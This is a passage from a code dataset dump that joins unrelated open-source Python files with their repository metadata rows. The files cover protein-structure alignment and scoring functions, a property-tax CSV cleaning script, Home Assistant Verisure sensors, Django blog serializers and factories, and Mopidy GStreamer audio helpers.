S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = torch.matmul(V, W).to(device)
# calculate rotations
X_ = torch.matmul(X_.t(), U).t()
# return centered and aligned
return X_, Y_
def kabsch_numpy(X, Y):
""" Kabsch alignment of X into Y.
Assumes X,Y are both (Dims x N_points). See below for wrapper.
"""
# center X and Y to the origin
X_ = X - X.mean(axis=-1, keepdims=True)
Y_ = Y - Y.mean(axis=-1, keepdims=True)
# calculate convariance matrix (for each prot in the batch)
C = np.dot(X_, Y_.transpose())
# Optimal rotation matrix via SVD
V, S, W = np.linalg.svd(C)
# determinant sign for direction correction
d = (np.linalg.det(V) * np.linalg.det(W)) < 0.0
if d:
S[-1] = S[-1] * (-1)
V[:, -1] = V[:, -1] * (-1)
# Create Rotation matrix U
U = np.dot(V, W)
# calculate rotations
X_ = np.dot(X_.T, U).T
# return centered and aligned
return X_, Y_
# metrics - more formulas here: http://predictioncenter.org/casp12/doc/help.html
def distmat_loss_torch(X=None, Y=None, X_mat=None, Y_mat=None, p=2, q=2, custom=None, distmat_mask=None):
""" Calculates a loss on the distance matrix - no need to align structs.
Inputs:
* X: (N, d) tensor. the predicted structure. One of (X, X_mat) is needed.
* X_mat: (N, N) tensor. the predicted distance matrix. Optional ()
* Y: (N, d) tensor. the true structure. One of (Y, Y_mat) is needed.
* Y_mat: (N, N) tensor. the predicted distance matrix. Optional ()
* p: int. power for the distance calculation (2 for euclidean)
* q: float. power for the scaling of the loss (2 for MSE, 1 for MAE, etc)
* custom: func or None. custom loss over distance matrices.
ex: lambda x,y: 1 - 1/ (1 + ((x-y))**2) (1 is very bad. 0 is good)
* distmat_mask: (N, N) mask (boolean or weights for each ij pos). optional.
"""
assert (X is not None or X_mat is not None) and \
(Y is not None or Y_mat is not None), "The true and predicted coords or dist mats must be provided"
# calculate distance matrices
if X_mat is None:
X_mat = torch.cdist(X, X, p=p)
if Y_mat is None:
Y_mat = torch.cdist(Y, Y, p=p)
if distmat_mask is None:
distmat_mask = torch.ones_like(Y_mat).bool()
# do custom expression if passed
if custom is not None:
loss = custom(X_mat, Y_mat).mean()
# **2 ensures always positive. Later scale back to desired power
else:
loss = ( X_mat - Y_mat )**2
if q != 2:
loss = loss**(q/2)
return loss[distmat_mask].mean()
def rmsd_torch(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return torch.sqrt( torch.mean((X - Y)**2, axis=(-1, -2)) )
def rmsd_numpy(X, Y):
""" Assumes x,y are both (B x D x N). See below for wrapper. """
return np.sqrt( np.mean((X - Y)**2, axis=(-1, -2)) )
def gdt_torch(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
device = X.device
if weights is None:
weights = torch.ones(1,len(cutoffs))
else:
weights = torch.tensor([weights]).to(device)
# set zeros and fill with values
GDT = torch.zeros(X.shape[0], len(cutoffs), device=device)
dist = ((X - Y)**2).sum(dim=1).sqrt()
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).float().mean(dim=-1)
# weighted mean
return (GDT*weights).mean(-1)
def gdt_numpy(X, Y, cutoffs, weights=None):
""" Assumes x,y are both (B x D x N). see below for wrapper.
* cutoffs is a list of `K` thresholds
* weights is a list of `K` weights (1 x each threshold)
"""
if weights is None:
weights = np.ones( (1,len(cutoffs)) )
else:
weights = np.array([weights])
# set zeros and fill with values
GDT = np.zeros( (X.shape[0], len(cutoffs)) )
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# iterate over thresholds
for i,cutoff in enumerate(cutoffs):
GDT[:, i] = (dist <= cutoff).mean(axis=-1)
# weighted mean
return (GDT*weights).mean(-1)
def tmscore_torch(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = ((X - Y)**2).sum(dim=1).sqrt()
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(dim=-1)
def tmscore_numpy(X, Y):
""" Assumes x,y are both (B x D x N). see below for wrapper. """
L = X.shape[-1]
d0 = 1.24 * np.cbrt(L - 15) - 1.8
# get distance
dist = np.sqrt( ((X - Y)**2).sum(axis=1) )
# formula (see wrapper for source):
return (1 / (1 + (dist/d0)**2)).mean(axis=-1)
def mdscaling_torch(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None,
eigen=False, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_torch(pre_dist_mat, weights=weights,iters=iters,
tol=tol, eigen=eigen, verbose=verbose)
if not fix_mirror:
return preds, stresses
# no need to caculate multiple mirrors - just correct Z axis
phi_ratios = calc_phis_torch(preds, N_mask, CA_mask, C_mask, prop=True)
to_correct = torch.nonzero( (phi_ratios < 0.5)).view(-1)
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
preds[to_correct, -1] = (-1)*preds[to_correct, -1]
if verbose == 2:
print("Corrected mirror idxs:", to_correct)
return preds, stresses
def mdscaling_numpy(pre_dist_mat, weights=None, iters=10, tol=1e-5,
fix_mirror=True, N_mask=None, CA_mask=None, C_mask=None, verbose=2):
""" Handles the specifics of MDS for proteins (mirrors, ...) """
# batched mds for full parallel
preds, stresses = mds_numpy(pre_dist_mat, weights=weights,iters=iters,
tol=tol, verbose=verbose)
if not fix_mirror:
return preds, stresses
# no need to caculate multiple mirrors - just correct Z axis
phi_ratios = calc_phis_numpy(preds, N_mask, CA_mask, C_mask, prop=True)
for i,pred in enumerate(preds):
# fix mirrors by (-1)*Z if more (+) than (-) phi angles
if phi_ratios < 0.5:
preds[i, -1] = (-1)*preds[i, -1]
if verbose == 2:
print("Corrected mirror in struct no.", i)
return preds, stresses
def lddt_ca_torch(true_coords, pred_coords, cloud_mask, r_0=15.):
""" Computes the lddt score for each C_alpha.
https://academic.oup.com/bioinformatics/article/29/21/2722/195896
Inputs:
* true_coords: (b, l, c, d) in sidechainnet format.
* pred_coords: (b, l, c, d) in sidechainnet format.
* cloud_mask : (b, l, c) adapted for scn format.
* r_0: float. maximum inclusion radius in reference struct.
Outputs:
* (b, l) lddt for c_alpha scores (ranging between 0 and 1)
See wrapper below.
"""
device, dtype = true_coords.device, true_coords.type()
thresholds = torch.tensor([0.5, 1, 2, 4], device=device).type(dtype)
# adapt masks
cloud_mask = cloud_mask.bool().cpu()
c_alpha_mask = torch.zeros(cloud_mask.shape[1:], device=device).bool() # doesn't have batch dim
c_alpha_mask[..., 1] = True
# container for c_alpha scores (between 0,1)
wrapper = torch.zeros(true_coords.shape[:2], device=device).type(dtype)
for bi, seq in enumerate(true_coords):
# select atoms for study
c_alphas = cloud_mask[bi]*c_alpha_mask # only pick c_alpha positions
selected_pred = pred_coords[bi, c_alphas, :]
selected_target = true_coords[bi, c_alphas, :]
# get number under distance
dist_mat_pred = torch.cdist(selected_pred, selected_pred, p=2)
dist_mat_target = torch.cdist(selected_target, selected_target, p=2)
under_r0_target = dist_mat_target < r_0
compare_dists = torch.abs(dist_mat_pred - dist_mat_target)[under_r0_target]
# measure diff below threshold
score = torch.zeros_like(under_r0_target).float()
max_score = torch.zeros_like(under_r0_target).float()
max_score[under_r0_target] = 4.
# measure under how many thresholds
score[under_r0_target] = thresholds.shape[0] - \
torch.bucketize( compare_dists, boundaries=thresholds ).float()
# dont include diagonal
l_mask = c_alphas.float().sum(dim=-1).bool()
wrapper[bi, l_mask] = ( score.sum(dim=-1) - thresholds.shape[0] ) / \
( max_score.sum(dim=-1) - thresholds.shape[0] )
return wrapper
################
### WRAPPERS ###
################
@set_backend_kwarg
@invoke_torch_or_numpy(mdscaling_torch, mdscaling_numpy)
def MDScaling(pre_dist_mat, **kwargs):
""" Gets distance matrix (-ces). Outputs 3d.
Assumes (for now) distrogram is (N x N) and symmetric.
For support of ditograms: see `center_distogram_torch()`
Inputs:
* pre_dist_mat: (1, N, N) distance matrix.
* weights: optional. (N x N) pairwise relative weights .
* iters: number of iterations to run the algorithm on
* tol: relative tolerance at which to stop the algorithm if no better
improvement is achieved
* backend: one of ["numpy", "torch", "auto"] for backend choice
* fix_mirror: int. number of iterations to run the 3d generation and
pick the best mirror (highest number of negative phis)
* N_mask: indexing array/tensor for indices of backbone N.
Only used if fix_mirror > 0.
* CA_mask: indexing array/tensor for indices of backbone C_alpha.
Only used if fix_mirror > 0.
* verbose: whether to print logs
Outputs:
* best_3d_coords: (3 x N)
* historic_stress: (timesteps, )
"""
pre_dist_mat = expand_dims_to(pre_dist_mat, 3 - len(pre_dist_mat.shape))
return pre_dist_mat, kwargs
@expand_arg_dims(dim_len = 2)
@set_backend_kwarg
@invoke_torch_or_numpy(kabsch_torch, kabsch_numpy)
def Kabsch(A, B):
""" Returns Kabsch-rotated matrices resulting
from aligning A into B.
Adapted from: https://github.com/charnley/rmsd/
* Inputs:
* A,B are (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of shape (3 x N)
"""
# run calcs - pick the 0th bc an additional dim was created
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(rmsd_torch, rmsd_numpy)
def RMSD(A, B):
""" Returns RMSD score as defined here (lower is better):
https://en.wikipedia.org/wiki/
Root-mean-square_deviation_of_atomic_positions
* Inputs:
* A,B are (B x 3 x N) or (3 x N)
* backend: one of ["numpy", "torch", "auto"] for backend choice
* Outputs: tensor/array of size (B,)
"""
return A, B
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(gdt_torch, gdt_numpy)
def GDT(A, B, *, mode="TS", cutoffs=[1,2,4,8], weights=None):
""" Returns GDT score as defined here (highre is better):
Supports both TS and HA
http://predictioncenter.org/casp12/doc/help.html
* Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* cutoffs: defines thresholds for gdt
* weights: list containing the weights
* mode: one of ["numpy", "torch", "auto"] for backend
* Outputs: tensor/array of size (B,)
"""
# define cutoffs for each type of gdt and weights
cutoffs = [0.5,1,2,4] if mode in ["HA", "ha"] else [1,2,4,8]
# calculate GDT
return A, B, cutoffs, {'weights': weights}
@expand_arg_dims()
@set_backend_kwarg
@invoke_torch_or_numpy(tmscore_torch, tmscore_numpy)
def TMscore(A, B):
""" Returns TMscore as defined here (higher is better):
>0.5 (likely) >0.6 (highly likely) same folding.
= 0.2. https://en.wikipedia.org/wiki/Template_modeling_score
Warning! It's not exactly the code in:
https://zhanglab.ccmb.med.umich.edu/TM-score/TMscore.cpp
but will suffice for now.
Inputs:
* A,B are (B x 3 x N) (np.array or torch.tensor)
* mode: one of ["numpy", "torch", "auto"] for backend
Outputs: tensor/array of size (B,)
"""
return A, B
| 41.356255
| 122
| 0.610033
| 0
| 0
| 0
| 0
| 4,773
| 0.095575
| 0
| 0
| 22,164
| 0.443813
|
4252097259c5f8f2219e8a65c81337c134ef50fa
| 1,151
|
py
|
Python
|
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | 2
|
2016-03-03T00:14:59.000Z
|
2016-08-21T14:28:02.000Z
|
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | null | null | null |
src/clean_property_file.py
|
wmaciel/van-crime
|
e70d0310f41de3a1b54572f6c6bf01083e56e0ab
|
[
"MIT"
] | null | null | null |
__author__ = 'walthermaciel'
import pandas as pd
import numpy as np
def load_csv(path):
# Load
print 'Loading', path
df = pd.read_csv(path)
# Remove unwanted columns
print 'Dropping unwanted columns'
df = df[['PID', 'TAX_ASSESSMENT_YEAR', 'CURRENT_LAND_VALUE', 'STREET_NAME', 'TO_CIVIC_NUMBER']]
df.columns = ['PID', 'YEAR', 'VALUE', 'STREET_NAME', 'STREET_NUMBER']
# Remove unwanted rows
print 'Removing null rows'
df.replace('', np.nan, inplace=True)
df.dropna(inplace=True)
# Compute average value for each property
print 'Computing average value for same address properties'
g_df = df.groupby(['STREET_NAME', 'STREET_NUMBER']).mean()
df = g_df.reset_index()
return df
def main():
for y in xrange(2006, 2016):
print y
path_in = '../data/property_tax_06_15/property_tax_report_csv' + str(y) + '.csv'
df = load_csv(path_in)
path_out = '../data/property_tax_06_15/avg_property_tax_'+ str(y) + '.csv'
print 'Saving', path_out
df.to_csv(path_or_buf=path_out, index=False)
print '\n'
if __name__ == '__main__':
main()
| 28.775
| 99
| 0.650738
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 502
| 0.436142
|
4252c9d8b3317ae5bd56696743e5b2124dce1942
| 4,040
|
py
|
Python
|
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | 1
|
2016-07-14T05:20:54.000Z
|
2016-07-14T05:20:54.000Z
|
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | null | null | null |
homeassistant/components/sensor/verisure.py
|
beschouten/home-assistant
|
f50c30bbbad4d92e342c8547630c63c0c7882803
|
[
"MIT"
] | 1
|
2018-11-22T13:55:23.000Z
|
2018-11-22T13:55:23.000Z
|
"""
Interfaces with Verisure sensors.
For more details about this platform, please refer to the documentation at
documentation at https://home-assistant.io/components/verisure/
"""
import logging
from homeassistant.components.verisure import HUB as hub
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Verisure platform."""
sensors = []
if int(hub.config.get('thermometers', '1')):
hub.update_climate()
sensors.extend([
VerisureThermometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'temperature') and value.temperature
])
if int(hub.config.get('hygrometers', '1')):
hub.update_climate()
sensors.extend([
VerisureHygrometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'humidity') and value.humidity
])
if int(hub.config.get('mouse', '1')):
hub.update_mousedetection()
sensors.extend([
VerisureMouseDetection(value.deviceLabel)
for value in hub.mouse_status.values()
# is this if needed?
if hasattr(value, 'amountText') and value.amountText
])
add_devices(sensors)
class VerisureThermometer(Entity):
"""Representation of a Verisure thermometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the device."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Temperature")
@property
def state(self):
"""Return the state of the device."""
# Remove ° character
return hub.climate_status[self._id].temperature[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity."""
return TEMP_CELSIUS
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureHygrometer(Entity):
"""Representation of a Verisure hygrometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Humidity")
@property
def state(self):
"""Return the state of the sensor."""
# remove % character
return hub.climate_status[self._id].humidity[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "%"
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureMouseDetection(Entity):
"""Representation of a Verisure mouse detector."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.mouse_status[self._id].location,
"Mouse")
@property
def state(self):
"""Return the state of the sensor."""
return hub.mouse_status[self._id].count
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "Mice"
def update(self):
"""Update the sensor."""
hub.update_mousedetection()
| 26.933333
| 74
| 0.611881
| 2,617
| 0.647612
| 0
| 0
| 1,715
| 0.4244
| 0
| 0
| 1,211
| 0.299678
|
4253d0f64f25024f864712c154a198a0bd7c1158
| 1,135
|
py
|
Python
|
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
articles/blogs/tests/factories.py
|
MahmoudFarid/articles
|
f0238908b1430c949dace50401fb3ddf268a581b
|
[
"MIT"
] | null | null | null |
import factory
from factory.django import DjangoModelFactory as Factory
from django.contrib.auth.models import Permission
from ..models import Blog
from articles.users.tests.factories import UserFactory
class Blogfactory(Factory):
user = user = factory.SubFactory(UserFactory)
title = factory.Faker('sentence', nb_words=3)
description = factory.Faker('paragraph', nb_sentences=5)
content = factory.Faker('paragraph', nb_sentences=10)
gdoc_link = 'https://docs.google.com/document/d/1NcF8_6ZMraTXp7H7DVzR6pbqzJgNIyg3gYLUUoFoYe8/edit'
status = factory.Faker('random_element', elements=[sttaus[0] for sttaus in Blog.STATUS_CHOICES])
class Meta:
model = Blog
def create_user_writer_with_permission():
user = UserFactory()
write_blogs_perm = Permission.objects.filter(codename='can_write_blogs').first()
user.user_permissions.add(write_blogs_perm)
return user
def create_editor_user_with_permission():
user = UserFactory()
review_blogs_perm = Permission.objects.filter(codename='can_review_blogs').first()
user.user_permissions.add(review_blogs_perm)
return user
| 33.382353
| 102
| 0.767401
| 488
| 0.429956
| 0
| 0
| 0
| 0
| 0
| 0
| 169
| 0.148899
|
425489e4c1a682c5eeaad70ce3b5e922f8f9536b
| 8,847
|
py
|
Python
|
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | null | null | null |
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | 115
|
2019-08-19T20:19:06.000Z
|
2022-03-04T17:40:50.000Z
|
api_formatter/serializers.py
|
RockefellerArchiveCenter/argo
|
c02fec68dbb50382f3f0bdf11c51240ca22a181c
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from django.urls import reverse
from rest_framework import serializers
from .view_helpers import description_from_notes
class ExternalIdentifierSerializer(serializers.Serializer):
identifier = serializers.CharField()
source = serializers.CharField()
class DateSerializer(serializers.Serializer):
expression = serializers.CharField()
begin = serializers.DateField()
end = serializers.CharField(allow_null=True)
label = serializers.DateField()
type = serializers.CharField()
class ExtentSerializer(serializers.Serializer):
value = serializers.FloatField()
type = serializers.CharField()
class LanguageSerializer(serializers.Serializer):
expression = serializers.CharField()
identifier = serializers.CharField()
class SubnoteSerializer(serializers.Serializer):
type = serializers.CharField()
content = serializers.SerializerMethodField()
def get_content(self, obj):
"""Coerce content into a list so it can be serialized as JSON."""
return list(obj.content)
class NoteSerializer(serializers.Serializer):
type = serializers.CharField()
title = serializers.CharField()
source = serializers.CharField()
subnotes = SubnoteSerializer(many=True)
class RightsGrantedSerializer(serializers.Serializer):
act = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
restriction = serializers.CharField()
notes = NoteSerializer(many=True, allow_null=True)
class RightsStatementSerializer(serializers.Serializer):
determination_date = serializers.DateField()
type = serializers.CharField()
rights_type = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
copyright_status = serializers.CharField(allow_null=True)
other_basis = serializers.CharField(allow_null=True)
jurisdiction = serializers.CharField(allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_granted = RightsGrantedSerializer(many=True)
class GroupSerializer(serializers.Serializer):
identifier = serializers.CharField()
title = serializers.CharField()
class ReferenceSerializer(serializers.Serializer):
title = serializers.CharField()
type = serializers.CharField(allow_null=True)
online = serializers.SerializerMethodField()
hit_count = serializers.IntegerField(allow_null=True)
online_hit_count = serializers.IntegerField(allow_null=True)
uri = serializers.SerializerMethodField()
dates = serializers.CharField(allow_null=True)
description = serializers.CharField(allow_null=True)
group = GroupSerializer(allow_null=True)
def get_online(self, obj):
return getattr(obj, "online", False)
def get_uri(self, obj):
if getattr(obj, "uri", None):
return obj.uri
basename = obj.type
if basename in ["person", "organization", "family", "software"]:
basename = "agent"
elif basename in ["cultural_context", "function", "geographic",
"genre_form", "occupation", "style_period", "technique",
"temporal", "topical"]:
basename = "term"
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.identifier}).rstrip("/")
class BaseListSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
type = serializers.CharField()
title = serializers.CharField()
dates = DateSerializer(many=True, allow_null=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id}).rstrip("/")
class BaseDetailSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
title = serializers.CharField()
type = serializers.CharField()
category = serializers.CharField(allow_null=True)
offset = serializers.IntegerField(allow_null=True)
group = GroupSerializer()
external_identifiers = ExternalIdentifierSerializer(many=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id}).rstrip("/")
class AgentSerializer(BaseDetailSerializer):
agent_type = serializers.CharField()
description = serializers.CharField(allow_null=True)
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
class AgentListSerializer(BaseListSerializer):
pass
class CollectionSerializer(BaseDetailSerializer):
level = serializers.CharField()
parent = serializers.CharField(allow_null=True)
languages = LanguageSerializer(many=True, allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
creators = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class CollectionListSerializer(BaseListSerializer):
pass
class ObjectSerializer(BaseDetailSerializer):
languages = LanguageSerializer(many=True, allow_null=True)
parent = serializers.CharField(allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True, allow_null=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class ObjectListSerializer(BaseListSerializer):
pass
class TermSerializer(BaseDetailSerializer):
term_type = serializers.CharField()
collections = ReferenceSerializer(many=True, allow_null=True)
objects = ReferenceSerializer(many=True, allow_null=True)
class TermListSerializer(BaseListSerializer):
pass
class CollectionHitSerializer(serializers.Serializer):
"""Serializes data for collapsed hits."""
category = serializers.CharField(source="group.category")
dates = serializers.SerializerMethodField()
hit_count = serializers.IntegerField()
online_hit_count = serializers.IntegerField(allow_null=True)
title = serializers.CharField(source="group.title")
uri = serializers.SerializerMethodField()
creators = serializers.SerializerMethodField()
def get_dates(self, obj):
return [d.to_dict() for d in obj.group.dates]
def get_creators(self, obj):
if getattr(obj.group, "creators", None):
return [c.title for c in obj.group.creators]
else:
return []
def get_uri(self, obj):
return obj.group.identifier.rstrip("/")
class FacetSerializer(serializers.Serializer):
"""Serializes facets."""
def to_representation(self, instance):
resp = {}
for k, v in instance.aggregations.to_dict().items():
if "buckets" in v:
resp[k] = v["buckets"]
elif "name" in v: # move nested aggregations up one level
resp[k] = v["name"]["buckets"]
elif k in ["max_date", "min_date"]: # convert timestamps to year
value = (datetime.fromtimestamp(v["value"] / 1000.0).year) if v["value"] else None
resp[k] = {"value": value}
else:
resp[k] = v
return resp
class AncestorsSerializer(serializers.Serializer):
"""Provides a nested dictionary representation of ancestors."""
def serialize_ancestors(self, ancestor_list, tree, idx):
ancestor = ancestor_list[idx]
serialized = ReferenceSerializer(ancestor).data
tree_data = {**serialized, **tree}
if idx == len(ancestor_list) - 1:
new_tree = tree_data
return new_tree
else:
new_tree = {"child": tree_data}
return self.serialize_ancestors(ancestor_list, new_tree, idx + 1)
def to_representation(self, instance):
resp = {}
if instance:
resp = self.serialize_ancestors(instance, {}, 0)
return resp
| 35.247012
| 98
| 0.706228
| 8,626
| 0.97502
| 0
| 0
| 0
| 0
| 0
| 0
| 643
| 0.07268
|
42549d1737ce596628e42957af0838f8a820986b
| 828
|
py
|
Python
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | 1
|
2016-10-01T18:35:24.000Z
|
2016-10-01T18:35:24.000Z
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | 8
|
2016-09-14T21:39:09.000Z
|
2016-10-25T20:08:31.000Z
|
cmz/cms_news/migrations/0004_auto_20160923_1958.py
|
inmagik/cmz
|
e183f0c7203bda5efb1cbeb96f4f06a76aa91231
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-09-23 19:58
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('cms_news', '0003_auto_20160923_1956'),
]
operations = [
migrations.AddField(
model_name='news',
name='date',
field=models.DateField(auto_now_add=True, default=datetime.datetime(2016, 9, 23, 19, 58, 10, 395979, tzinfo=utc)),
preserve_default=False,
),
migrations.AddField(
model_name='newstranslation',
name='title',
field=models.CharField(default='Hello cmz', max_length=300),
preserve_default=False,
),
]
| 27.6
| 126
| 0.621981
| 617
| 0.745169
| 0
| 0
| 0
| 0
| 0
| 0
| 152
| 0.183575
|
42553eda4ebfb5ccb85d9727626440163f717d34
| 3,252
|
py
|
Python
|
mopidy/audio/utils.py
|
grdorin/mopidy
|
76db44088c102d7ad92a3fc6a15a938e66b99b0d
|
[
"Apache-2.0"
] | 6,700
|
2015-01-01T03:57:59.000Z
|
2022-03-30T09:31:31.000Z
|
mopidy/audio/utils.py
|
pnijhara/mopidy
|
7168787ea6c82b66e138fc2b388d78fa1c7661ba
|
[
"Apache-2.0"
] | 1,141
|
2015-01-02T09:48:59.000Z
|
2022-03-28T22:25:30.000Z
|
mopidy/audio/utils.py
|
pnijhara/mopidy
|
7168787ea6c82b66e138fc2b388d78fa1c7661ba
|
[
"Apache-2.0"
] | 735
|
2015-01-01T21:15:50.000Z
|
2022-03-20T16:13:44.000Z
|
from mopidy import httpclient
from mopidy.internal.gi import Gst
def calculate_duration(num_samples, sample_rate):
"""Determine duration of samples using GStreamer helper for precise
math."""
return Gst.util_uint64_scale(num_samples, Gst.SECOND, sample_rate)
def create_buffer(data, timestamp=None, duration=None):
"""Create a new GStreamer buffer based on provided data.
Mainly intended to keep gst imports out of non-audio modules.
.. versionchanged:: 2.0
``capabilites`` argument was removed.
"""
if not data:
raise ValueError("Cannot create buffer without data")
buffer_ = Gst.Buffer.new_wrapped(data)
if timestamp is not None:
buffer_.pts = timestamp
if duration is not None:
buffer_.duration = duration
return buffer_
def millisecond_to_clocktime(value):
"""Convert a millisecond time to internal GStreamer time."""
return value * Gst.MSECOND
def clocktime_to_millisecond(value):
"""Convert an internal GStreamer time to millisecond time."""
return value // Gst.MSECOND
def supported_uri_schemes(uri_schemes):
"""Determine which URIs we can actually support from provided whitelist.
:param uri_schemes: list/set of URIs to check support for.
:type uri_schemes: list or set or URI schemes as strings.
:rtype: set of URI schemes we can support via this GStreamer install.
"""
supported_schemes = set()
registry = Gst.Registry.get()
for factory in registry.get_feature_list(Gst.ElementFactory):
for uri in factory.get_uri_protocols():
if uri in uri_schemes:
supported_schemes.add(uri)
return supported_schemes
def setup_proxy(element, config):
"""Configure a GStreamer element with proxy settings.
:param element: element to setup proxy in.
:type element: :class:`Gst.GstElement`
:param config: proxy settings to use.
:type config: :class:`dict`
"""
if not hasattr(element.props, "proxy") or not config.get("hostname"):
return
element.set_property("proxy", httpclient.format_proxy(config, auth=False))
element.set_property("proxy-id", config.get("username"))
element.set_property("proxy-pw", config.get("password"))
class Signals:
"""Helper for tracking gobject signal registrations"""
def __init__(self):
self._ids = {}
def connect(self, element, event, func, *args):
"""Connect a function + args to signal event on an element.
Each event may only be handled by one callback in this implementation.
"""
if (element, event) in self._ids:
raise AssertionError
self._ids[(element, event)] = element.connect(event, func, *args)
def disconnect(self, element, event):
"""Disconnect whatever handler we have for an element+event pair.
Does nothing it the handler has already been removed.
"""
signal_id = self._ids.pop((element, event), None)
if signal_id is not None:
element.disconnect(signal_id)
def clear(self):
"""Clear all registered signal handlers."""
for element, event in list(self._ids):
element.disconnect(self._ids.pop((element, event)))
| 31.882353
| 78
| 0.681119
| 995
| 0.305966
| 0
| 0
| 0
| 0
| 0
| 0
| 1,400
| 0.430504
|
425582d3b0bd9aebc3e98f0f395cf656db9c8b38
| 467
|
py
|
Python
|
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
day09/part1.py
|
mtn/advent16
|
0df34237485ee1246532e9eda0ef643e6950d13e
|
[
"MIT"
] | null | null | null |
